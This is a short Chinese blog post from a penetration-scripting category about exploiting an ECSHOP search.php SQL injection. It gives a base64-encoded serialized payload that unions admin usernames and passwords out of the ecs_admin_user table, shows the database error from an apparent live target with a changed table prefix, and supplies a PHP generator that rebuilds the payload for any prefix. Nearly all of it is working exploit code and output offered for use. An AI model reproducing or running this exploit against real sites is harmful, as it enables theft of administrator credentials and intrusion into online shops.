遇到一个ECSHOP 利用网上的EXP
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319返回:MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM `ma526073ww`.`73ww_goods_attr` WHERE 0 OR (1 AND attr_id = ‘1’) and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,’"\’) union select 1#"’),1 from ecs_admin_user#’ AND attr_value LIKE ‘%1%’ ) GROUP BY goods_id HAVING num = ‘1’ ) [2] => Array ( [error] => Table ‘ma526073ww.ecs_admin_user’ doesn’t exist ) [3] => Array ( [errno] => 1146 ) )
原因是数据库前缀修改的问题。
解决办法:重新生成EXP变种文件。
用下面的代码生成一个code
<?php$p="ecs_";$p=isset($_REQUEST[‘pre’])?$_REQUEST[‘pre’]:$p;$arr=array("1′) and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,’&;\’) union select 1#&;’),1 from ".$p."admin_user#"=>"1"); $exp = array("attr"=>$arr); $exp = base64_encode(serialize($exp)); //echo $exp;?><textarea name="textarea" id="textarea" cols="100" rows="5"><?=$exp?></textarea>
以上代码保存为x.php,
73ww_为表前缀。
通过http://www.hackline.net/x.php?pre=73ww_访问,生成新的BASE64加密文件。
标签分类: 脚本渗透
人之所以有一张嘴,而有两只耳朵,原因是听的要比说的多一倍。
